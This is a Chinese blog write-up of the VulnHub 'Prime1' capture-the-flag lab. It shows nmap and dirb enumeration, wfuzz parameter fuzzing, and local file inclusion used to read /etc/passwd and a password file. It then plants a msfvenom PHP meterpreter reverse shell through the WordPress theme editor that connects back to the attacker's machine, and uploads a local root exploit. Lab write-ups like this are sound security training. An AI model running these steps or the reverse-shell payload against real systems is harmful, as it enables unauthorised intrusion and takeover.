kali-vulnhub:prime1

1.使用virtualbox打开后出现如下界面:

2.主要思路如下:

3.发现主机IP

$ nmap -sP 192.168.0.1/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-22 08:50 EST
Nmap scan report for 192.168.0.1
Host is up (0.0039s latency).
Nmap scan report for 192.168.0.101
Host is up (0.063s latency).
Nmap scan report for 192.168.0.104
Host is up (0.000083s latency).
Nmap scan report for 192.168.0.105
Host is up (0.057s latency).
Nmap scan report for 192.168.0.106
Host is up (0.00066s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.48 seconds

可以发现多了一台192.168.0.106的主机  所以靶机的IP为192.168.0.106

4.扫描端口,发现主机对应运行的软件(服务)

$ nmap -Pn 192.168.0.106
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-22 08:51 EST
Nmap scan report for 192.168.0.106
Host is up (0.000093s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

发现主机开启了22,80端口先从比较容易的80端口入手   

端口与之对应的服务关系:

端口与服务对应关系_weixin_30765475的博客-程序员ITS404 - 程序员ITS404 

5.浏览器访问靶机192.168.0.106:80    查看界面和源代码未发现异常

 

 

 

6.开始目录扫描,使用工具dirb  dirb教程_hyled-Ava的博客-CSDN博客_dirb使用

$ dirb http://192.168.0.106
...(此处省略许多内容)
---- Scanning URL: http://192.168.0.106/ ----
+ http://192.168.0.106/dev (CODE:200|SIZE:131)                                                                    
+ http://192.168.0.106/index.php (CODE:200|SIZE:136)
...(此处省略许多内容)
---- Entering directory: http://192.168.0.106/wordpress/ ----
...(此处省略许多内容)
(发现有cms:wordpress)


(再次扫描,寻找txt,php,zip文件,一般这类文件中可能包含一些敏感信息)
$ dirb http://192.168.0.106 -X .txt,.zip,.php
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan 22 09:15:23 2022
URL_BASE: http://192.168.0.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.php,.zip) | (.txt)(.php)(.zip) [NUM = 3]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.106/ ----
+ http://192.168.0.106/image.php (CODE:200|SIZE:147)                                                               
+ http://192.168.0.106/index.php (CODE:200|SIZE:136)                                                               
+ http://192.168.0.106/secret.txt (CODE:200|SIZE:412)                                                              
                                                                                                                   
-----------------
END_TIME: Sat Jan 22 09:15:25 2022
DOWNLOADED: 13836 - FOUND: 3

7.发现了有个 secret.txt文件

$ curl http://192.168.0.106/secret.txt
Looks like you have got some secrets.

Ok I just want to do some help to you. 

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
 


//see the location.txt and you will get your next move//

内容中让我们给每一个php文件(index.php,image.php)进行参数破解(利用https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web),然后再访问“location.txt”这个文件

8.通过所提供链接上的说明,可以暴破出一个参数 "file"

$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hw 12 http://192.168.0.106/index.php?FUZZ=1
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.0.106/index.php?FUZZ=1
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                            
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"                                             

Total time: 0.514398
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1848.760

9.查看 http://192.168.0.106/index.php?file=location.txt

$ curl http://192.168.0.106/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

内容提示另一个php文件有一个参数“secrettier360”

10.可能会发生“本地文件包含漏洞”并且“/etc/passwd”是一个敏感文件     

查看http://192.168.0.106/image.php?secrettier360=/etc/passwd

$ curl http://192.168.0.106/image.php?secrettier=/etc/passwd

 与开头界面“find password.txt file in my directory”

11.查看 http://192.168.0.106/image.php?secrettier360=/home/saket/password.txt

$ curl http://192.168.0.106/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>

发现一个密码:follow_the_ippsec        到这里对于php文件就结束了

12.由于发现了wordpress   就可以去访问  并且也知道了用户名与密码   登录后台

13.找到 Appearance -> Theme Editer -> secret.php  因为只有这个php文件才能被修改并去保存上传      可以利用这个使靶机向本机生成反弹连接    之后就可以进入靶机

使用 msfvenom 生成php反弹连接代码   Msfvenom命令总结大全_卿's Blog-CSDN博客

$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.104 LPORT=8888 -o shell.php

将生成的php文件内容复制粘贴至secret.php上面,并上传

14.开启msfconsole监听8888端口MSF建立webshell后门,并监听端口建立session连接_土拨鼠挖洞中的博客-CSDN博客_msf监听端口

15.访问一下secret.php文件  触发反弹连接

http://192.168.0.106/wordpress/wp-content/themes/twentynineteen/secret.php

16.使用msfconsole    找到普通用户提升为root用户的文件,并且编译它

使用upload上传至/tmp目录(每个用户都有权限访问它)  用chmod添加运行权限   然后运行它

17.最终获得root权限任务完成

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值